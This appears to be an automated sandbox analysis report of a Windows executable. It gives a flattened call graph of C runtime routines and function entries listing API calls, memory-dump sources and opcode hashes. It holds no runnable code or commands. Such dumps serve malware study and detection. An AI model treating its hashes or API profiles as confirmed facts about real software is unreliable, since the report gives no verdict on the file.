7675 40af48 7674->7675 7676 40af89 7675->7676 7677 40af6e 7675->7677 7687 40af4c 7675->7687 7679 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 7676->7679 7678 405b6a __calloc_impl 67 API calls 7677->7678 7680 40af73 7678->7680 7681 40af94 7679->7681 7682 406ee2 __calloc_impl 6 API calls 7680->7682 7683 40afa0 7681->7683 7684 40b03c WideCharToMultiByte 7681->7684 7682->7687 7688 40afae _memset 7683->7688 7693 40afe4 _memset 7683->7693 7685 40b06e GetLastError 7684->7685 7684->7688 7685->7688 7685->7693 7686 405b6a __calloc_impl 67 API calls 7689 40afc6 7686->7689 7688->7686 7688->7687 7691 405b6a __calloc_impl 67 API calls 7689->7691 7690 405b6a __calloc_impl 67 API calls 7692 40aff1 7690->7692 7691->7687 7694 406ee2 __calloc_impl 6 API calls 7692->7694 7693->7687 7693->7690 7694->7687 7550 403b1e 7551 403b38 __indefinite 7550->7551 7554 403baa 7551->7554 7555 403bb3 7554->7555 7557 403b50 7554->7557 7555->7557 7558 4082da 7555->7558 7559 408317 __handle_exc 7558->7559 7560 4041a9 __raise_exc RaiseException 7559->7560 7561 40833a __ctrlfp __umatherr 7559->7561 7560->7561 7562 4043ae __umatherr 67 API calls 7561->7562 7563 408405 7561->7563 7562->7563 7564 40841c __atodbl_l 5 API calls 7563->7564 7565 408412 7564->7565 7565->7557 7639 40badf 7640 40563c __amsg_exit 67 API calls 7639->7640 7641 40bae6 7640->7641 7695 405f9f 7702 40ad2e 7695->7702 7698 405fb2 7700 407275 ___convertcp 67 API calls 7698->7700 7701 405fbd 7700->7701 7715 40ac54 7702->7715 7704 405fa4 7704->7698 7705 40ab05 7704->7705 7706 40ab11 __calloc_impl 7705->7706 7707 4048fc __lock 67 API calls 7706->7707 7711 40ab1d 7707->7711 7708 40ab86 7745 40ab9b 7708->7745 7710 40ab92 __calloc_impl 7710->7698 7711->7708 7713 40ab5b DeleteCriticalSection 7711->7713 7732 40c977 7711->7732 7714 407275 ___convertcp 67 API calls 7713->7714 7714->7711 7716 40ac60 __calloc_impl 7715->7716 7717 4048fc __lock 67 API calls 7716->7717 7718 40ac6f 7717->7718 7719 40ad07 7718->7719 7722 406000 _flsall 68 API calls 7718->7722 7724 40ac0c 105 API calls __fflush_nolock 7718->7724 7725 40acf6 7718->7725 7728 40ad25 7719->7728 7721 40ad13 __calloc_impl 7721->7704 7722->7718 7724->7718 7726 40606e _flsall 2 API calls 7725->7726 7727 40ad04 7726->7727 7727->7718 7731 404822 LeaveCriticalSection 7728->7731 7730 40ad2c 7730->7721 7731->7730 7733 40c983 __calloc_impl 7732->7733 7734 40c9b4 7733->7734 7735 40c997 7733->7735 7741 40c9ac __calloc_impl 7734->7741 7748 405fbf 7734->7748 7736 405b6a __calloc_impl 67 API calls 7735->7736 7738 40c99c 7736->7738 7740 406ee2 __calloc_impl 6 API calls 7738->7740 7740->7741 7741->7711 7835 404822 LeaveCriticalSection 7745->7835 7747 40aba2 7747->7710 7749 405fd1 7748->7749 7750 405ff3 EnterCriticalSection 7748->7750 7749->7750 7752 405fd9 7749->7752 7751 405fe9 7750->7751 7754 40c900 7751->7754 7753 4048fc __lock 67 API calls 7752->7753 7753->7751 7755 40c930 7754->7755 7756 40c914 7754->7756 7759 40aba4 __flush 101 API calls 7755->7759 7768 40c929 7755->7768 7757 405b6a __calloc_impl 67 API calls 7756->7757 7758 40c919 7757->7758 7760 406ee2 __calloc_impl 6 API calls 7758->7760 7761 40c93c 7759->7761 7760->7768 7773 40f832 7761->7773 7764 40ad9b __fileno 67 API calls 7765 40c94a 7764->7765 7777 40f765 7765->7777 7767 40c950 7767->7768 7769 407275 ___convertcp 67 API calls 7767->7769 7770 40c9eb 7768->7770 7769->7768 7828 406032 7770->7828 7772 40c9f1 7772->7741 7774 40c944 7773->7774 7775 40f842 7773->7775 7774->7764 7775->7774 7776 407275 ___convertcp 67 API calls 7775->7776 7776->7774 7778 40f771 __calloc_impl 7777->7778 7779 40f794 7778->7779 7780 40f779 7778->7780 7782 40f7a2 7779->7782 7785 40f7e3 7779->7785 7781 405b7d __dosmaperr 67 API calls 7780->7781 7783 40f77e 7781->7783 7784 405b7d __dosmaperr 67 API calls 7782->7784 7786 405b6a __calloc_impl 67 API calls 7783->7786 7787 40f7a7 7784->7787 7788 40fb88 ___lock_fhandle 68 API calls 7785->7788 7799 40f786 __calloc_impl 7786->7799 7789 405b6a __calloc_impl 67 API calls 7787->7789 7791 40f7e9 7788->7791 7790 40f7ae 7789->7790 7792 406ee2 __calloc_impl 6 API calls 7790->7792 7793 40f804 7791->7793 7794 40f7f6 7791->7794 7792->7799 7796 405b6a __calloc_impl 67 API calls 7793->7796 7800 40f6c9 7794->7800 7797 40f7fe 7796->7797 7815 40f828 7797->7815 7799->7767 7801 40fb11 __close_nolock 67 API calls 7800->7801 7804 40f6d9 7801->7804 7802 40f72f 7818 40fa8b 7802->7818 7804->7802 7806 40fb11 __close_nolock 67 API calls 7804->7806 7814 40f70d 7804->7814 7805 40fb11 __close_nolock 67 API calls 7807 40f719 CloseHandle 7805->7807 7810 40f704 7806->7810 7807->7802 7811 40f725 GetLastError 7807->7811 7809 40f759 7809->7797 7813 40fb11 __close_nolock 67 API calls 7810->7813 7811->7802 7812 405b90 __dosmaperr 67 API calls 7812->7809 7813->7814 7814->7802 7814->7805 7827 40fc28 LeaveCriticalSection 7815->7827 7817 40f830 7817->7799 7819 40faf7 7818->7819 7820 40fa9c 7818->7820 7821 405b6a __calloc_impl 67 API calls 7819->7821 7820->7819 7825 40fac7 7820->7825 7822 40fafc 7821->7822 7823 405b7d __dosmaperr 67 API calls 7822->7823 7824 40f737 7823->7824 7824->7809 7824->7812 7825->7824 7826 40fae7 SetStdHandle 7825->7826 7826->7824 7827->7817 7829 406062 LeaveCriticalSection 7828->7829 7830 406043 7828->7830 7829->7772 7830->7829 7831 40604a 7830->7831 7834 404822 LeaveCriticalSection 7831->7834 7833 40605f 7833->7772 7834->7833 7835->7747 7642 403ae0 7643 403afb 7642->7643 7644 403baa 68 API calls 7643->7644 7645 403b0c 7644->7645 7836 4061a0 7839 4061aa 7836->7839 7837 4061c3 7839->7837 7840 40616d 7839->7840 7841 406173 7840->7841 7843 40617e 7841->7843 7844 40adcd 7841->7844 7843->7839 7845 40ad9b __fileno 67 API calls 7844->7845 7846 40addd 7845->7846 7847 40ade8 7846->7847 7848 40adff 7846->7848 7849 405b6a __calloc_impl 67 API calls 7847->7849 7850 40ae10 __stbuf 7848->7850 7851 40ae03 7848->7851 7858 40aded 7849->7858 7850->7858 7859 40ad37 __write_nolock 67 API calls 7850->7859 7861 40ae66 7850->7861 7864 40ae71 7850->7864 7852 405b6a __calloc_impl 67 API calls 7851->7852 7852->7858 7853 40af00 7855 40d126 __locking 101 API calls 7853->7855 7854 40ae80 7856 40ae97 7854->7856 7860 40aeb4 7854->7860 7855->7858 7857 40d126 __locking 101 API calls 7856->7857 7857->7858 7858->7843 7859->7861 7860->7858 7868 40d368 7860->7868 7861->7864 7865 40d481 7861->7865 7864->7853 7864->7854 7866 4090e7 __malloc_crt 67 API calls 7865->7866 7867 40d496 7866->7867 7867->7864 7869 40d374 __calloc_impl 7868->7869 7870 40d3a1 7869->7870 7871 40d385 7869->7871 7873 40d3af 7870->7873 7875 40d3d0 7870->7875 7872 405b7d __dosmaperr 67 API calls 7871->7872 7874 40d38a 7872->7874 7876 405b7d __dosmaperr 67 API calls 7873->7876 7880 405b6a __calloc_impl 67 API calls 7874->7880 7878 40d3f0 7875->7878 7879 40d416 7875->7879 7877 40d3b4 7876->7877 7881 405b6a __calloc_impl 67 API calls 7877->7881 7882 405b7d __dosmaperr 67 API calls 7878->7882 7883 40fb88 ___lock_fhandle 68 API calls 7879->7883 7894 40d392 __calloc_impl 7880->7894 7884 40d3bb 7881->7884 7885 40d3f5 7882->7885 7886 40d41c 7883->7886 7889 406ee2 __calloc_impl 6 API calls 7884->7889 7890 405b6a __calloc_impl 67 API calls 7885->7890 7887 40d445 7886->7887 7888 40d429 7886->7888 7892 405b6a __calloc_impl 67 API calls 7887->7892 7891 40d2e3 __lseeki64_nolock 69 API calls 7888->7891 7889->7894 7893 40d3fc 7890->7893 7895 40d43a 7891->7895 7896 40d44a 7892->7896 7897 406ee2 __calloc_impl 6 API calls 7893->7897 7894->7858 7900 40d477 7895->7900 7898 405b7d __dosmaperr 67 API calls 7896->7898 7897->7894 7898->7895 7903 40fc28 LeaveCriticalSection 7900->7903 7902 40d47f 7902->7894 7903->7902 7904 40fea0 7905 40feb1 7904->7905 7906 40feb9 7904->7906 7905->7906 7908 40feb6 CloseHandle 7905->7908 7907 40fecb 7906->7907 7909 40fec8 CloseHandle 7906->7909 7908->7906 7909->7907 7910 408fa2 7913 408f1a 7910->7913 7912 408fc0 7914 408f86 7913->7914 7915 408f27 7913->7915 7971 40880b 7914->7971 7915->7914 7917 408f2c 7915->7917 7918 408f31 7917->7918 7919 408f4a 7917->7919 7927 408d65 7918->7927 7921 408f6d 7919->7921 7923 408f54 7919->7923 7958 4088fb 7921->7958 7941 408e20 7923->7941 7926 408f6b 7926->7912 7985 40b949 7927->7985 7930 408d9f 7931 405b6a __calloc_impl 67 API calls 7930->7931 7933 408da4 7931->7933 7932 408dbe 7995 40b7cd 7932->7995 7934 406ee2 __calloc_impl 6 API calls 7933->7934 7936 408db0 7934->7936 7938 40841c __atodbl_l 5 API calls 7936->7938 7940 408e1e 7938->7940 7940->7912 7942 40b949 __fltout2 67 API calls 7941->7942 7943 408e51 7942->7943 7944 408e5a 7943->7944 7945 408e7c 7943->7945 7946 405b6a __calloc_impl 67 API calls 7944->7946 7949 40b7cd __fptostr 67 API calls 7945->7949 7947 408e5f 7946->7947 7948 406ee2 __calloc_impl 6 API calls 7947->7948 7956 408e6b 7948->7956 7952 408ea8 7949->7952 7950 40841c __atodbl_l 5 API calls 7951 408f18 7950->7951 7951->7926 7953 408eef 7952->7953 7955 408ec7 7952->7955 7952->7956 8039 40869c 7953->8039 7957 408c6e __cftof2_l 77 API calls 7955->7957 7956->7950 7957->7956 7959 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 7958->7959 7960 408920 7959->7960 7961 40892f 7960->7961 7962 40895f 7960->7962 7963 405b6a __calloc_impl 67 API calls 7961->7963 7964 40896d 7962->7964 7968 408976 7962->7968 7965 408934 7963->7965 7966 405b6a __calloc_impl 67 API calls 7964->7966 7967 406ee2 __calloc_impl 6 API calls 7965->7967 7966->7965 7970 408943 _memset __alldvrm __cftoa_l _strrchr 7967->7970 7968->7970 8058 4088db 7968->8058 7970->7926 7972 40b949 __fltout2 67 API calls 7971->7972 7973 40883c 7972->7973 7974 408845 7973->7974 7976 408864 7973->7976 7975 405b6a __calloc_impl 67 API calls 7974->7975 7977 40884a 7975->7977 7980 40b7cd __fptostr 67 API calls 7976->7980 7978 406ee2 __calloc_impl 6 API calls 7977->7978 7979 408856 7978->7979 7982 40841c __atodbl_l 5 API calls 7979->7982 7981 4088a8 7980->7981 7981->7979 7983 40869c __cftoe2_l 77 API calls 7981->7983 7984 4088d9 7982->7984 7983->7979 7984->7926 7986 40b974 ___dtold 7985->7986 8021 40e730 7986->8021 7989 409ebb _strcpy_s 67 API calls 7990 40b9af 7989->7990 7991 406dba __invoke_watson 10 API calls 7990->7991 7993 40b9c2 7990->7993 7991->7993 7992 40841c __atodbl_l 5 API calls 7994 408d96 7992->7994 7993->7992 7994->7930 7994->7932 7996 40b802 7995->7996 7997 40b7e4 7995->7997 7996->7997 7999 40b807 7996->7999 7998 405b6a __calloc_impl 67 API calls 7997->7998 8000 40b7e9 7998->8000 8002 40b81c 7999->8002 8005 40b82a _strlen 7999->8005 8001 406ee2 __calloc_impl 6 API calls 8000->8001 8004 408df1 8001->8004 8003 405b6a __calloc_impl 67 API calls 8002->8003 8003->8000 8004->7936 8007 408c6e 8004->8007 8005->8004 8006 4091d0 ___sbh_free_block __VEC_memcpy 8005->8006 8006->8004 8008 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 8007->8008 8009 408c8c 8008->8009 8010 408c90 8009->8010 8015 408cc3 8009->8015 8011 405b6a __calloc_impl 67 API calls 8010->8011 8012 408c95 8011->8012 8013 406ee2 __calloc_impl 6 API calls 8012->8013 8020 408ca6 _memset 8013->8020 8014 408cff 8017 408657 __shift __VEC_memcpy 8014->8017 8014->8020 8015->8014 8035 408657 8015->8035 8018 408d14 8017->8018 8019 408657 __shift __VEC_memcpy 8018->8019 8018->8020 8019->8020 8020->7936 8026 40e7a6 8021->8026 8022 40e813 8025 409ebb _strcpy_s 67 API calls 8022->8025 8023 40841c __atodbl_l 5 API calls 8024 40b98f 8023->8024 8024->7989 8027 40e876 8025->8027 8026->8022 8028 40e82b 8026->8028 8033 40e7c3 8026->8033 8030 406dba __invoke_watson 10 API calls 8027->8030 8027->8033 8029 409ebb _strcpy_s 67 API calls 8028->8029 8031 40e84a 8029->8031 8030->8033 8032 406dba __invoke_watson 10 API calls 8031->8032 8031->8033 8032->8033 8033->8023 8034 40f028 8033->8034 8036 408660 _strlen 8035->8036 8037 408671 8035->8037 8038 4091d0 ___sbh_free_block __VEC_memcpy 8036->8038 8037->8014 8038->8037 8040 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 8039->8040 8041 4086b4 8040->8041 8042 4086ba 8041->8042 8044 4086ea 8041->8044 8043 405b6a __calloc_impl 67 API calls 8042->8043 8045 4086bf 8043->8045 8047 408707 8044->8047 8048 4086fe 8044->8048 8046 406ee2 __calloc_impl 6 API calls 8045->8046 8057 4086ce 8046->8057 8050 408657 __shift __VEC_memcpy 8047->8050 8051 40872b 8047->8051 8049 405b6a __calloc_impl 67 API calls 8048->8049 8049->8045 8050->8051 8052 409ebb _strcpy_s 67 API calls 8051->8052 8053 408782 8052->8053 8054 408795 8053->8054 8055 406dba __invoke_watson 10 API calls 8053->8055 8056 4091d0 ___sbh_free_block __VEC_memcpy 8054->8056 8054->8057 8055->8054 8056->8057 8057->7956 8059 40880b __cftoe_l 77 API calls 8058->8059 8060 4088f6 8059->8060 8060->7970 7646 405eee 7647 405efb 7646->7647 7648 40912c __calloc_crt 67 API calls 7647->7648 7649 405f15 7648->7649 7650 40912c __calloc_crt 67 API calls 7649->7650 7651 405f2e 7649->7651 7650->7651 7398 40bc74 RtlUnwind 8061 40a2b4 8071 40a238 8061->8071 8064 40a348 _memset __setmbcp_nolock 8078 40a001 GetCPInfo 8064->8078 8065 40a2df setSBCS 8066 40841c __atodbl_l 5 API calls 8065->8066 8068 40a497 8066->8068 8067 40a323 IsValidCodePage 8067->8065 8069 40a335 GetCPInfo 8067->8069 8069->8064 8069->8065 8072 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 8071->8072 8073 40a24c 8072->8073 8074 40a275 8073->8074 8075 40a257 GetOEMCP 8073->8075 8076 40a267 8074->8076 8077 40a27a GetACP 8074->8077 8075->8076 8076->8064 8076->8065 8076->8067 8077->8076 8079 40a0e7 8078->8079 8081 40a035 _memset 8078->8081 8084 40841c __atodbl_l 5 API calls 8079->8084 8080 40c529 ___crtGetStringTypeA 91 API calls 8082 40a0a2 8080->8082 8081->8080 8083 40c32a ___crtLCMapStringA 102 API calls 8082->8083 8085 40a0c2 8083->8085 8086 40a192 8084->8086 8087 40c32a ___crtLCMapStringA 102 API calls 8085->8087 8086->8064 8087->8079 8088 407db5 8089 407dc1 __calloc_impl 8088->8089 8090 407dd9 8089->8090 8091 407275 ___convertcp 67 API calls 8089->8091 8093 407ec3 __calloc_impl 8089->8093 8092 407de7 8090->8092 8094 407275 ___convertcp 67 API calls 8090->8094 8091->8090 8095 407df5 8092->8095 8097 407275 ___convertcp 67 API calls 8092->8097 8094->8092 8096 407e03 8095->8096 8098 407275 ___convertcp 67 API calls 8095->8098 8099 407e11 8096->8099 8100 407275 ___convertcp 67 API calls 8096->8100 8097->8095 8098->8096 8101 407e1f 8099->8101 8102 407275 ___convertcp 67 API calls 8099->8102 8100->8099 8103 407275 ___convertcp 67 API calls 8101->8103 8106 407e2d 8101->8106 8102->8101 8103->8106 8104 407275 ___convertcp 67 API calls 8107 407e3e 8104->8107 8105 4048fc __lock 67 API calls 8108 407e46 8105->8108 8106->8104 8106->8107 8107->8105 8109 407e52 InterlockedDecrement 8108->8109 8110 407e6b 8108->8110 8109->8110 8111 407e5d 8109->8111 8124 407ecf 8110->8124 8111->8110 8114 407275 ___convertcp 67 API calls 8111->8114 8114->8110 8115 4048fc __lock 67 API calls 8116 407e7f 8115->8116 8117 407eb0 8116->8117 8118 40a829 ___removelocaleref 8 API calls 8116->8118 8127 407edb 8117->8127 8122 407e94 8118->8122 8121 407275 ___convertcp 67 API calls 8121->8093 8122->8117 8123 40a651 ___freetlocinfo 67 API calls 8122->8123 8123->8117 8130 404822 LeaveCriticalSection 8124->8130 8126 407e78 8126->8115 8131 404822 LeaveCriticalSection 8127->8131 8129 407ebd 8129->8121 8130->8126 8131->8129 7399 408676 7402 4084ea 7399->7402 7403 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 7402->7403 7404 4084fe 7403->7404 7411 40b651 7404->7411 7406 40850a 7407 40851e 7406->7407 7415 40b50e 7406->7415 7409 40b651 __forcdecpt_l 102 API calls 7407->7409 7410 408527 7409->7410 7412 40b66f 7411->7412 7414 40b65f 7411->7414 7420 40b53c 7412->7420 7414->7406 7416 40b51c 7415->7416 7417 40b52e 7415->7417 7416->7406 7484 40b4bd 7417->7484 7421 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 7420->7421 7422 40b551 7421->7422 7423 40b5b1 7422->7423 7424 40b55d 7422->7424 7425 40b5d6 7423->7425 7427 40b0ba __isleadbyte_l 77 API calls 7423->7427 7426 40a976 __isctype_l 91 API calls 7424->7426 7429 40b575 7424->7429 7428 405b6a __calloc_impl 67 API calls 7425->7428 7430 40b5dc 7425->7430 7426->7429 7427->7425 7428->7430 7429->7414 7432 40c32a 7430->7432 7433 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 7432->7433 7434 40c33d 7433->7434 7437 40bf85 7434->7437 7438 40bfa6 LCMapStringW 7437->7438 7442 40bfc1 7437->7442 7439 40bfc9 GetLastError 7438->7439 7438->7442 7439->7442 7440 40c1bf 7444 40f4cc ___ansicp 91 API calls 7440->7444 7441 40c01b 7443 40c034 MultiByteToWideChar 7441->7443 7463 40c1b6 7441->7463 7442->7440 7442->7441 7452 40c061 7443->7452 7443->7463 7446 40c1e7 7444->7446 7445 40841c __atodbl_l 5 API calls 7448 40c328 7445->7448 7449 40c200 7446->7449 7450 40c2db LCMapStringA 7446->7450 7446->7463 7447 40c07a ___convertcp 7451 40c0b2 MultiByteToWideChar 7447->7451 7447->7463 7448->7429 7453 40f515 ___convertcp 74 API calls 7449->7453 7457 40c237 7450->7457 7454 40c0cb LCMapStringW 7451->7454 7455 40c1ad 7451->7455 7452->7447 7458 403395 _malloc 67 API calls 7452->7458 7459 40c212 7453->7459 7454->7455 7461 40c0ec 7454->7461 7460 40bf65 ___convertcp 67 API calls 7455->7460 7456 40c302 7456->7463 7466 407275 ___convertcp 67 API calls 7456->7466 7457->7456 7462 407275 ___convertcp 67 API calls 7457->7462 7458->7447 7459->7463 7464 40c21c LCMapStringA 7459->7464 7460->7463 7465 40c0f5 7461->7465 7470 40c11e 7461->7470 7462->7456 7463->7445 7464->7457 7468 40c23e 7464->7468 7465->7455 7467 40c107 LCMapStringW 7465->7467 7466->7463 7467->7455 7472 40c24f _memset ___convertcp 7468->7472 7473 403395 _malloc 67 API calls 7468->7473 7469 40c16d LCMapStringW 7474 40c185 WideCharToMultiByte 7469->7474 7475 40c1a7 7469->7475 7471 403395 _malloc 67 API calls 7470->7471 7476 40c139 ___convertcp 7470->7476 7471->7476 7472->7457 7477 40c28d LCMapStringA 7472->7477 7473->7472 7474->7475 7478 40bf65 ___convertcp 67 API calls 7475->7478 7476->7455 7476->7469 7479 40c2a9 7477->7479 7480 40c2ad 7477->7480 7478->7455 7483 40bf65 ___convertcp 67 API calls 7479->7483 7482 40f515 ___convertcp 74 API calls 7480->7482 7482->7479 7483->7457 7485 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 7484->7485 7486 40b4d0 7485->7486 7487 40b4ea 7486->7487 7488 40a976 __isctype_l 91 API calls 7486->7488 7487->7406 7488->7487 7652 40a5fa 7655 404822 LeaveCriticalSection 7652->7655 7654 40a601 7655->7654 7566 40863d 7569 4085fb 7566->7569 7570 408627 7569->7570 7571 40860e 7569->7571 7582 40b725 7570->7582 7575 40b67d 7571->7575 7574 408617 7576 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 7575->7576 7577 40b6a3 7576->7577 7589 40e038 7577->7589 7579 40b6bb __ld12tod 7580 40841c __atodbl_l 5 API calls 7579->7580 7581 40b723 7580->7581 7581->7574 7583 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 7582->7583 7584 40b74b 7583->7584 7585 40e038 ___strgtold12_l 67 API calls 7584->7585 7586 40b763 __ld12tod 7585->7586 7587 40841c __atodbl_l 5 API calls 7586->7587 7588 40b7cb 7587->7588 7588->7574 7590 40e083 7589->7590 7596 40e0a2 7589->7596 7591 405b6a __calloc_impl 67 API calls 7590->7591 7592 40e088 7591->7592 7593 406ee2 __calloc_impl 6 API calls 7592->7593 7598 40e098 7593->7598 7594 40841c __atodbl_l 5 API calls 7595 40e6fd 7594->7595 7595->7579 7596->7598 7599 40fc4f 7596->7599 7598->7594 7602 40fc81 7599->7602 7600 40841c __atodbl_l 5 API calls 7601 40fe1b 7600->7601 7601->7598 7602->7600 7603 40993f 7604 409942 7603->7604 7605 40be4e _abort 69 API calls 7604->7605 7606 40994e __calloc_impl 7605->7606 8132 4090bf 8133 4090cb SetLastError 8132->8133 8134 4090d3 __calloc_impl 8132->8134 8133->8134

                                                        Executed Functions

                                                        Function 004038CA Relevance: 21.1, APIs: 14, Instructions: 86COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                                        • String ID:
                                                        • API String ID: 2477803136-0
                                                        • Opcode ID: 55a75209081753db21fe90352bca722720aa1b5174487b2b9d7f02c13d1d6b9a
                                                        • Instruction ID: 4d34ed221a603986baafc3b490fe9ee0ac988487a940e438daf9dc0b721e7aab
                                                        • Opcode Fuzzy Hash: 55a75209081753db21fe90352bca722720aa1b5174487b2b9d7f02c13d1d6b9a
                                                        • Instruction Fuzzy Hash: 782194A1D0074499EB147F739846B6F2A689F0070AF10487FF4457A1D2EABCDE419B5D
                                                        Function 004055DC Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 62 4055dc-4055fe HeapCreate 63 405600-405601 62->63 64 405602-40560b 62->64
                                                        APIs
                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004055F1
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: CreateHeap
                                                        • String ID:
                                                        • API String ID: 10892065-0
                                                        • Opcode ID: c3123c9c4030a1a5e9ae62ae76111dcff124cdbe5bbe755f4680c7aacda7825b
                                                        • Instruction ID: 77f26234ab174d6b3d664015af184a37d4aef173991afb3d41f41048f881ceb4
                                                        • Opcode Fuzzy Hash: c3123c9c4030a1a5e9ae62ae76111dcff124cdbe5bbe755f4680c7aacda7825b
                                                        • Instruction Fuzzy Hash: 2CD0A7765543456EDB005F76BC09B633BDCE784395F108436F90CC6590F674C590CB08

                                                        Non-executed Functions

                                                        Function 00402780 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 161timeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 0040281F
                                                        • GetCommConfig.KERNEL32(00000000,00000000,00000000), ref: 00402864
                                                        • GetNumberFormatW.KERNEL32(00000000,00000000,gosiyoruvazaligusa lejivo hutawucadajira,00000000,?,00000000), ref: 00402891
                                                        • GetLogicalDriveStringsW.KERNEL32(00000000,?), ref: 004028A0
                                                        • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004028B3
                                                        • GetComputerNameW.KERNEL32(?,?), ref: 004028C4
                                                        • ClearCommBreak.KERNEL32(00000000), ref: 004028CC
                                                        • InterlockedIncrement.KERNEL32(?), ref: 004028D6
                                                        • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 004028DE
                                                        • GetTempFileNameW.KERNEL32(00000000,?,00000000,00000000), ref: 004028F1
                                                        • _memset.LIBCMT ref: 00402906
                                                        • CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 00402916
                                                        • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 0040292B
                                                        • GetVersionExW.KERNEL32(?), ref: 00402938
                                                        • InterlockedIncrement.KERNEL32(?), ref: 00402942
                                                        • SetVolumeMountPointW.KERNEL32(00000000,00000000), ref: 00402954
                                                        • GlobalMemoryStatus.KERNEL32(00000000), ref: 0040295C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Comm$ConfigFileIncrementInterlockedNameVersion$AttributesBreakClearComputerConsoleDialogDriveEnumFormatFormatsGlobalInfoInputLogicalMemoryMountNumberPointReadStatusStringsTempTimeVerifyVolume_memset
                                                        • String ID: $gosiyoruvazaligusa lejivo hutawucadajira
                                                        • API String ID: 506528498-2210585140
                                                        • Opcode ID: 037e5d191132ad2b14524fa6fca01ab55c1a2ed6f758744307c817d5b39f1ee1
                                                        • Instruction ID: cf355d90496da7791a3c19a47d785b8762527cb921606fece1e7f5650e3ceb49
                                                        • Opcode Fuzzy Hash: 037e5d191132ad2b14524fa6fca01ab55c1a2ed6f758744307c817d5b39f1ee1
                                                        • Instruction Fuzzy Hash: 01611C75E40208AFDB10DF94DD89B9EB7B4FB48701F108169E605BB2D0D7B46A44CF69
                                                        Function 004029B0 Relevance: 18.1, APIs: 12, Instructions: 99timeprocesspipeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00402A0F
                                                        • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00402A15
                                                        • GetConsoleAliasExesW.KERNEL32(?,00000000), ref: 00402A24
                                                        • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402A3A
                                                        • SetFileShortNameW.KERNEL32(00000000,00000000), ref: 00402A44
                                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402A5E
                                                        • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402A70
